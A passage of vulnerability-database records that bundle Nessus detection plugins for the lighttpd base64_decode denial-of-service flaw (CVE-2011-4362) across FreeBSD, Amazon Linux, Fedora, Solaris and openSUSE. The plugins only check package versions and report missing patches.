https://vuxml.freebsd.org/freebsd/c6521b04-314b-11e1-9cf4-5404a67eef98.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?336cdb6a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"lighttpd<1.4.30\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T03:19:52", "description": "According to its banner, the version of lighttpd running on the remote\nhost is prior to 1.4.30. It is, therefore, affected by a denial of\nservice vulnerability. The HTTP server allows out-of-bounds values to\nbe decoded during the auth process and later uses these values as\noffsets. Using negative values as offsets can result in application\ncrashes.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 27, "cvss3": {"score": 5.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}, "published": "2011-12-28T00:00:00", "title": "lighttpd < 1.4.30 base64_decode Function Out-of-Bounds Read Error DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:lighttpd:lighttpd"], "id": "LIGHTTPD_1_4_30.NASL", "href": "https://www.tenable.com/plugins/nessus/57410", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57410);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2011-4362\");\n script_bugtraq_id(50851);\n script_xref(name:\"EDB-ID\", value:\"18295\");\n\n script_name(english:\"lighttpd < 1.4.30 base64_decode Function Out-of-Bounds Read Error DoS\");\n script_summary(english:\"Checks version in Server response header.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of lighttpd running on the remote\nhost is prior to 1.4.30. It is, therefore, affected by a denial of\nservice vulnerability. The HTTP server allows out-of-bounds values to\nbe decoded during the auth process and later uses these values as\noffsets. Using negative values as offsets can result in application\ncrashes.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cdaac48a\");\n script_set_attribute(attribute:\"see_also\", value:\"http://redmine.lighttpd.net/issues/2370\");\n script_set_attribute(attribute:\"see_also\", value:\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2011_01.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to lighttpd version 1.4.30 or later. Alternatively, apply the\nvendor-supplied patch or disable mod_auth.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/28\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:lighttpd:lighttpd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_keys(\"www/lighttpd\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nappname = \"lighttpd\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\nport = get_http_port(default:80);\napp_info = vcf::get_app_info(app:appname, port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [{\"fixed_version\":\"1.4.30\"}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T01:18:01", "description": "Integer signedness error in the base64_decode function in the HTTP\nauthentication functionality (http_auth.c) in lighttpd 1.4 before\n1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to\ncause a denial of service (segmentation fault) via crafted base64\ninput that triggers an out-of-bounds read with a negative index.", "edition": 23, "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : lighttpd (ALAS-2012-107)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:lighttpd-mod_geoip", "p-cpe:/a:amazon:linux:lighttpd-mod_mysql_vhost", "p-cpe:/a:amazon:linux:lighttpd-debuginfo", "p-cpe:/a:amazon:linux:lighttpd-fastcgi", "p-cpe:/a:amazon:linux:lighttpd", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2012-107.NASL", "href": "https://www.tenable.com/plugins/nessus/69597", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-107.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69597);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-4362\");\n script_xref(name:\"ALAS\", value:\"2012-107\");\n\n script_name(english:\"Amazon Linux AMI : lighttpd (ALAS-2012-107)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Integer signedness error in the base64_decode function in the HTTP\nauthentication functionality (http_auth.c) in lighttpd 1.4 before\n1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to\ncause a denial of service (segmentation fault) via crafted base64\ninput that triggers an out-of-bounds read with a negative index.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-107.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update lighttpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-mod_geoip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-1.4.31-1.2.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-debuginfo-1.4.31-1.2.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-fastcgi-1.4.31-1.2.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-mod_geoip-1.4.31-1.2.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-mod_mysql_vhost-1.4.31-1.2.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd / lighttpd-debuginfo / lighttpd-fastcgi / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:10:43", "description": "This update fixes CVE-2011-4362 by updating to the latest release. It\nalso fixes problems that had been reported with previous releases,\nsuch as ssl-related crashes on startup. This update fixes some minor\nSSL related problems, as well as a connection stall bug. This update\nfixes some minor SSL related problems, as well as a connection stall\nbug. This update fixes some minor SSL related problems, as well as a\nconnection stall bug.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2012-06-26T00:00:00", "title": "Fedora 16 : lighttpd-1.4.31-1.fc16 (2012-9078)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "modified": "2012-06-26T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:lighttpd", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-9078.NASL", "href": "https://www.tenable.com/plugins/nessus/59690", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9078.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59690);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4362\");\n script_bugtraq_id(50851);\n script_xref(name:\"FEDORA\", value:\"2012-9078\");\n\n script_name(english:\"Fedora 16 : lighttpd-1.4.31-1.fc16 (2012-9078)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes CVE-2011-4362 by updating to the latest release. It\nalso fixes problems that had been reported with previous releases,\nsuch as ssl-related crashes on startup. This update fixes some minor\nSSL related problems, as well as a connection stall bug. This update\nfixes some minor SSL related problems, as well as a connection stall\nbug. This update fixes some minor SSL related problems, as well as a\nconnection stall bug.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=758624\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082686.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7b2b223c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"lighttpd-1.4.31-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:10:43", "description": "This update fixes CVE-2011-4362 by updating to the latest release. It\nalso fixes problems that had been reported with previous releases,\nsuch as ssl-related crashes on startup. This update fixes some minor\nSSL related problems, as well as a connection stall bug. This update\nfixes some minor SSL related problems, as well as a connection stall\nbug. This update fixes some minor SSL related problems, as well as a\nconnection stall bug.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2012-06-26T00:00:00", "title": "Fedora 17 : lighttpd-1.4.31-1.fc17 (2012-9040)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "modified": "2012-06-26T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:lighttpd"], "id": "FEDORA_2012-9040.NASL", "href": "https://www.tenable.com/plugins/nessus/59689", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9040.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59689);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4362\");\n script_bugtraq_id(50851);\n script_xref(name:\"FEDORA\", value:\"2012-9040\");\n\n script_name(english:\"Fedora 17 : lighttpd-1.4.31-1.fc17 (2012-9040)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes CVE-2011-4362 by updating to the latest release. It\nalso fixes problems that had been reported with previous releases,\nsuch as ssl-related crashes on startup. This update fixes some minor\nSSL related problems, as well as a connection stall bug. This update\nfixes some minor SSL related problems, as well as a connection stall\nbug. This update fixes some minor SSL related problems, as well as a\nconnection stall bug.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=758624\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082765.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?28c4e40a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"lighttpd-1.4.31-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:01:04", "description": "The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - Integer signedness error in the base64_decode function\n in the HTTP authentication functionality (http_auth.c)\n in lighttpd 1.4 before 1.4.30 and 1.5 before SVN\n revision 2806 allows remote attackers to cause a denial\n of service (segmentation fault) via crafted base64 input\n that triggers an out-of-bounds read with a negative\n index. (CVE-2011-4362)", "edition": 24, "published": "2015-01-19T00:00:00", "title": "Oracle Solaris Third-Party Patch Update : lighttpd (cve_2011_4362_denial_of)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "modified": "2015-01-19T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.0", "p-cpe:/a:oracle:solaris:lighttpd"], "id": "SOLARIS11_LIGHTTPD_20120417.NASL", "href": "https://www.tenable.com/plugins/nessus/80697", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80697);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-4362\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : lighttpd (cve_2011_4362_denial_of)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - Integer signedness error in the base64_decode function\n in the HTTP authentication functionality (http_auth.c)\n in lighttpd 1.4 before 1.4.30 and 1.5 before SVN\n revision 2806 allows remote attackers to cause a denial\n of service (segmentation fault) via crafted base64 input\n that triggers an out-of-bounds read with a negative\n index. (CVE-2011-4362)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blogs.oracle.com/sunsecurity/cve-2011-4362-denial-of-service-dos-vulnerability-in-lighttpd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11/11 SRU 6.6.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:lighttpd\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^lighttpd$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.0.6.0.6.0\", sru:\"SRU 6.6\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : lighttpd\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_warning(port:0, extra:error_extra);\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"lighttpd\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-20T14:36:33", "description": "This update of lighttpd fixes an out-of-bounds read due to a\nsignedness error which could cause a Denial of Service\n(CVE-2011-4362). Additionally an option was added to honor the server\ncipher order (resolves lighttpd#2364).", "edition": 19, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : lighttpd (openSUSE-SU-2012:0240-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_webdav", "cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool", "p-cpe:/a:novell:opensuse:lighttpd", "p-cpe:/a:novell:opensuse:lighttpd-mod_magnet-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost", "p-cpe:/a:novell:opensuse:lighttpd-mod_magnet", "p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_cml-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-debugsource", "p-cpe:/a:novell:opensuse:lighttpd-mod_cml", "p-cpe:/a:novell:opensuse:lighttpd-mod_webdav-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl"], "id": "SUSE_11_4_LIGHTTPD-120130.NASL", "href": "https://www.tenable.com/plugins/nessus/75941", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update lighttpd-5735.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75941);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-4362\");\n\n script_name(english:\"openSUSE Security Update : lighttpd (openSUSE-SU-2012:0240-1)\");\n script_summary(english:\"Check for the lighttpd-5735 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a 